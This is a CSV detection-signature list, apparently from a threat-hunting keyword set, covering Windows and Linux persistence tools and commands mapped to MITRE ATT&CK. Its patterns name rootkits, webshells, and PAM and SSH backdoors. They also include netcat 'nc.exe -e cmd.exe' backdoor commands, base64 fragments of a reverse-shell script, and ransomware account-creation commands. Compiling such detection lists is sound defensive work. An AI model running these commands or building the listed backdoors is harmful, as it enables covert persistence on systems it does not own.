"*invoke-ridhijacking.py*",".{0,1000}invoke\-ridhijacking\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*Invoke-SDPropagator*",".{0,1000}Invoke\-SDPropagator.{0,1000}","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","N/A","1","96","19","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z"
"*Invoke-WCMDump.ps1*",".{0,1000}Invoke\-WCMDump\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*Invoke-WMIpersist*",".{0,1000}Invoke\-WMIpersist.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z"
"*Invoke-WMIpersist.ps1*",".{0,1000}Invoke\-WMIpersist\.ps1.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","1","N/A","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z"
"*IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX*",".{0,1000}IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA*",".{0,1000}JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*jackson5sec/ShimDB*",".{0,1000}jackson5sec\/ShimDB.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*JumpSession_BOF-main*",".{0,1000}JumpSession_BOF\-main.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","78","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z"
"*JunctionFolder.exe*",".{0,1000}JunctionFolder\.exe.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*KeePass config file is backdoored already*",".{0,1000}KeePass\sconfig\sfile\sis\sbackdoored\salready.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*KeePassBackdoor.*",".{0,1000}KeePassBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*l3m0n/WinPirate*",".{0,1000}l3m0n\/WinPirate.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*Laudanum PHP File Browser*",".{0,1000}Laudanum\sPHP\sFile\sBrowser.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Laudanum PHP Hostname by IP Lookup*",".{0,1000}Laudanum\sPHP\sHostname\sby\sIP\sLookup.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Laudanum PHP Proxy*",".{0,1000}Laudanum\sPHP\sProxy.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Laudanum PHP Shell Access*",".{0,1000}Laudanum\sPHP\sShell\sAccess.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*LDPreloadPrivesc*",".{0,1000}LDPreloadPrivesc.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*Linux/SSHDoor*",".{0,1000}Linux\/SSHDoor.{0,1000}","signature_keyword","sshdoor","Openssh backdoor","T1059.003 - T1105 - T1071.001","TA0011 - TA0003","N/A","FANCY BEAR","Persistence","https://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf","1","0","#Avsignature","N/A","10","9","N/A","N/A","N/A","N/A"
"*linux-pam-backdoor-master*",".{0,1000}linux\-pam\-backdoor\-master.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","320","83","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*LKM_HACKING.html*",".{0,1000}LKM_HACKING\.html.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*lkmRootkitmodified*",".{0,1000}lkmRootkitmodified.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*ln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service*",".{0,1000}ln\s\-s\s\/run\/systemd\/system\/generator\.service\s\/run\/systemd\/system\/multi\-user\.target\.wants\/generator\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*Loader'z WEB shell*",".{0,1000}Loader\'z\sWEB\sshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Lolipop.php - Edited By KingDefacer*",".{0,1000}Lolipop\.php\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*m0nad/Diamorphine*",".{0,1000}m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*Made by: @Trevohack | @opabravo | @matheuz*",".{0,1000}Made\sby\:\s\@Trevohack\s\|\s\@opabravo\s\|\s\@matheuz.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*MAGIC_PREFIX ""diamorphine_secret*",".{0,1000}MAGIC_PREFIX\s\""diamorphine_secret.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MALICIOUS_MAGIC = b""IDOV31""*",".{0,1000}MALICIOUS_MAGIC\s\=\sb\""IDOV31\"".{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*mandiant/SharPersist*",".{0,1000}mandiant\/SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*master/ImplantSSP/*",".{0,1000}master\/ImplantSSP\/.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*MatheuZSecurity/D3m0n1z3dShell*",".{0,1000}MatheuZSecurity\/D3m0n1z3dShell.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*mdsecactivebreach/WMIPersistence*",".{0,1000}mdsecactivebreach\/WMIPersistence.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","112","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z"
"*mertdas/RedPersist*",".{0,1000}mertdas\/RedPersist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*mIcHyAmRaNe/wso-webshell*",".{0,1000}mIcHyAmRaNe\/wso\-webshell.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","1","N/A","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*mimipenguin.sh*",".{0,1000}mimipenguin\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*mkj/dropbear*",".{0,1000}mkj\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","1","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*Modified by: Trevohack aka *SpaceShuttleIO*",".{0,1000}Modified\sby\:\sTrevohack\saka\s.{0,1000}SpaceShuttleIO.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*MODULE_AUTHOR(""m0nad"")*",".{0,1000}MODULE_AUTHOR\(\""m0nad\""\).{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MODULE_DESCRIPTION(""LKM rootkit""*",".{0,1000}MODULE_DESCRIPTION\(\""LKM\srootkit\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MODULE_NAME ""diamorphine""*",".{0,1000}MODULE_NAME\s\""diamorphine\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*MotdPersistence*",".{0,1000}MotdPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*mv ""/media/windows/Windows/System32/sethc.exe"" ""/media/windows/Windows/System32/*",".{0,1000}mv\s\""\/media\/windows\/Windows\/System32\/sethc\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*namespace RedPersist.Persist*",".{0,1000}namespace\sRedPersist\.Persist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*namespace SharpSC*",".{0,1000}namespace\sSharpSC.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*nano /etc/ssh/sshd_config*",".{0,1000}nano\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - couldbe an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","#linux","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*nc.exe * -e cmd.exe"" /sc ONCE *",".{0,1000}nc\.exe\s.{0,1000}\s\-e\scmd\.exe\""\s\/sc\sONCE\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*nc.exe -e \windows\system32\cmd.exe * start= auto*",".{0,1000}nc\.exe\s\-e\s\\windows\\system32\\cmd\.exe\s.{0,1000}\sstart\=\sauto.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*nccgroup/ABPTTS*",".{0,1000}nccgroup\/ABPTTS.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*net accounts /maxpwage:unlimited*",".{0,1000}net\saccounts\s\/maxpwage\:unlimited.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1098 - T1068 - T1112 - T1088 - T1546.015 - T1059","TA0001 - TA0002 - TA0003 - TA0004 - TA0008","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net localgroup ""Cert Publishers"" /domain*",".{0,1000}net\slocalgroup\s\""Cert\sPublishers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1098 - T1068 - T1112 - T1088 - T1546.015 - T1059","TA0001 - TA0002 - TA0003 - TA0004 - TA0008","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net localgroup \""Remote Desktop Users\"" Support /add*",".{0,1000}net\slocalgroup\s\\\""Remote\sDesktop\sUsers\\\""\sSupport\s\/add.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1098 - T1068 - T1112 - T1088 - T1546.015 - T1059","TA0001 - TA0002 - TA0003 - TA0004 - TA0008","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net localgroup administrators /add troll*",".{0,1000}net\slocalgroup\sadministrators\s\/add\stroll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*net localgroup Administrators Support /add*",".{0,1000}net\slocalgroup\sAdministrators\sSupport\s\/add.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1098 - T1068 - T1112 - T1088 - T1546.015 - T1059","TA0001 - TA0002 - TA0003 - TA0004 - TA0008","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net user BitdefenderBounty *",".{0,1000}net\suser\sBitdefenderBounty\s.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NET USER GUEST /ACTIVE:YES*",".{0,1000}NET\sUSER\sGUEST\s\/ACTIVE\:YES.{0,1000}","greyware_tool_keyword","net","activate the guest account in Windows","T1078 - T1087.001 - T1136.001","TA0006 - TA0007 - TA0003","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net user localadm *",".{0,1000}net\suser\slocaladm\s.{0,1000}","greyware_tool_keyword","net","adding the user localadm - observed used by the Dispossessor Ransomware group ","T1547.001","TA0003","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net user localadm *",".{0,1000}net\suser\slocaladm\s.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net user Support * /add *",".{0,1000}net\suser\sSupport\s.{0,1000}\s\/add\s.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1098 - T1068 - T1112 - T1088 - T1546.015 - T1059","TA0001 - TA0002 - TA0003 - TA0004 - TA0008","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
